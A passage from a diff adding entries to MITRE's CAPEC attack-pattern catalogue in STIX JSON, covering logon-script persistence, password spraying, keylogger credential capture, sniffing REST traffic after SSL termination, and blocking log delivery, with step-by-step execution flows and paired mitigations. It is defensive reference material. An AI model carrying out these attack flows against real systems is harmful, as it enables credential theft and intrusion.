"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.", + "external_references": [ + { + "external_id": "CAPEC-564", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/564.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Boot or Logon Initialization Scripts", + "external_id": "T1037", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1037" + }, + { + "description": "Create or Modify System Process: Launch Agent", + "external_id": "T1543.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/001" + }, + { + "description": "Create or Modify System Process: Launch Daemon", + "external_id": "T1543.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/004" + }, + { + "description": "Boot or Logon Autostart Execution", + "external_id": "T1547", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547" + } + ], + "id": "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Run Software at Logon", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict write access to logon scripts to necessary administrators.", + "id": "course-of-action--ac6fb253-4318-4476-bd92-98025e9f081b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-564-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0065118-5899-4093-ad4e-1d2e77d85ff5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac6fb253-4318-4476-bd92-98025e9f081b", + "target_ref": "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.\n ", + "external_references": [ + { + "external_id": "CAPEC-565", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Spraying", + "external_id": "T1110.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/003" + }, + { + "description": "ACSC Releases Advisory on Password Spraying Attacks, 2019--08---08, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-565", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/current-activity/2019/08/08/acsc-releases-advisory-password-spraying-attacks" + }, + { + "description": "Andy Greenberg, A notorious Iranian hacking crew is targeting industrial control systems, 2019--11---23, Ars Technica", + "external_id": "REF-566", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2019/11/a-notorious-iranian-hacking-crew-is-targeting-industrial-control-systems/" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "id": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Spraying", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user selects the phrase \"Password123\" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.", + "The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target's password policy: Determine the password policies of the target system/application.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

  2. Select passwords: Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)

    3. Techniques
    Select passwords based on common use or a particular user's additional details.
    Select passwords based on the target's password complexity policies.

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.

    2. Techniques
    Manually or automatically enter the first password for each known user account through the target's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Iterate through the remaining passwords for each known user account.
", + "x_capec_extended_description": "\n Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.\n Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts on the target system/application." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "Applicable password lists.", + "A password cracking tool or a custom script that leverages the password list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--883bf7e0-d6d7-4599-a405-4cf773ba06f2", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--63dc5428-39f8-4790-9341-12ee76d16b3c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39894d0f-45fc-4d1e-ac83-029554eb758f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-566", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/566.html" + } + ], + "id": "attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Dump Password Hashes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-567", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/567.html" + } + ], + "id": "attack-pattern--e8f4c3d0-0aaf-4a96-b31c-9e6e8b5e15da", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Obtain Data via Utilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "external_id": "CAPEC-568", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html" + }, + { + "description": "Input Capture:Keylogging", + "external_id": "T1056.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/001" + } + ], + "id": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

  1. Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

    2. Techniques
    Send a phishing email with a malicious attachment that installs a keylogger on a user's system
    Conceal a keylogger behind fake software and get the user to download the software
    Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
    Gain access to the user's system through a vulnerability and manually install a keylogger

  2. Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

  3. Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

    4. Techniques
    Search for repeated sequences that are following by the enter key
    Search for repeated sequences that are not found in a dictionary
    Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

  1. Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security can help reduce the ability of an adversary to install a keylogger.", + "id": "course-of-action--ac31ad94-cdd7-4233-9c7b-3341818f95c1", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-568-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76f04316-3bcf-4941-8aa8-df14017ac277", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac31ad94-cdd7-4233-9c7b-3341818f95c1", + "target_ref": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.", + "external_references": [ + { + "external_id": "CAPEC-569", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/569.html" + }, + { + "description": "Input Capture", + "external_id": "T1056", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056" + } + ], + "id": "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Collect Data as Provided by Users", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.", + "external_references": [ + { + "external_id": "CAPEC-57", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/57.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "id": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Utilizing REST's Trust in the System Resource to Obtain Sensitive Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the adversary can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a REST-style application that uses SSL: The adversary must first find a REST-style application that uses SSL to target. Because this attack is easier to carry out from inside of a server network, it is likely that an adversary could have inside knowledge of how services operate.

Experiment

  1. Insert a listener to sniff client-server communication: The adversary inserts a listener that must exist beyond the point where SSL is terminated. This can be placed on the client side if it is believed that sensitive information is being sent to the client as a response, although most often the listener will be placed on the server side to listen for client authentication information.

    2. Techniques
    Run wireshark or tcpdump on a device that is on the inside of a firewall, load balancer, or router of a network and capture traffic after SSL has been terminated

Exploit

  1. Gather information passed in the clear: If developers have not hashed or encrypted data sent in the sniffed request, the adversary will be able to read this data in the clear. Most commonly, they will now have a username or password that they can use to submit requests to the web service just as an authorized user

", + "x_capec_extended_description": "\n Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required.\n Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The adversary can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the adversary gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Opportunity to intercept must exist beyond the point where SSL is terminated.", + "The adversary must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path." + ], + "x_capec_skills_required": { + "Low": "To insert a network sniffer or other listener into the communication stream" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement message level security such as HMAC in the HTTP communication", + "id": "course-of-action--411ad2e6-57aa-4f31-be81-4e85c4618602", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-57-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d6d23a13-264b-4642-b6ca-c39f175c9d9e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--411ad2e6-57aa-4f31-be81-4e85c4618602", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize defense in depth, do not rely on a single security mechanism like SSL", + "id": "course-of-action--fab2d0ed-1d80-4531-a345-10e8bbb142d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-57-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d893b6fe-7c69-4a0a-a687-450db912f094", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fab2d0ed-1d80-4531-a345-10e8bbb142d5", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8ca2309-7035-4c1b-91a7-0c39f533a82b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-570", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/570.html" + } + ], + "id": "attack-pattern--80f16e35-c7c1-445d-8f12-a77bbbce6bcf", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Signature-Based Avoidance", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary prevents host-generated logs being delivered to a central location in an attempt to hide indicators of compromise.\n ", + "external_references": [ + { + "external_id": "CAPEC-571", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/571.html" + }, + { + "description": "Impair Defenses: Disable Windows Event Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Impair Command History Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Indicator Blocking", + "external_id": "T1562.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/006" + }, + { + "description": "Impair Defenses: Disable Cloud Logs", + "external_id": "T1562.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/008" + } + ], + "id": "attack-pattern--8f91fa23-b5c4-48f1-be6c-99582524f8cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Block Logging to Central Repository", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n In the case of network based reporting of indicators, an adversary may block traffic associated with reporting to prevent central station analysis. This may be accomplished by many means such as stopping a local process to creating a host-based firewall rule to block traffic to a specific server.\n In the case of local based reporting of indicators, an adversary may block delivery of locally-generated log files themselves to the central repository.\n ", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary modifies file contents by adding data to files for several reasons. Many different attacks could “follow” this pattern resulting in numerous outcomes. Adding data to a file could also result in a Denial of Service condition for devices with limited storage capacity.\n ", + "external_references": [ + { + "external_id": "CAPEC-572", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/572.html" + }, + { + "description": "Obfuscated Files or Information:Binary Padding", + "external_id": "T1027.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/001" + } + ], + "id": "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Artificially Inflate File Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary could potentially increase file sizes on devices containing limited storage resources, such as SCADA or IOT devices, resulting in denial of service conditions.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.", + "external_references": [ + { + "external_id": "CAPEC-573", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/573.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Process Discovery", + "external_id": "T1057", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1057" + } + ], + "id": 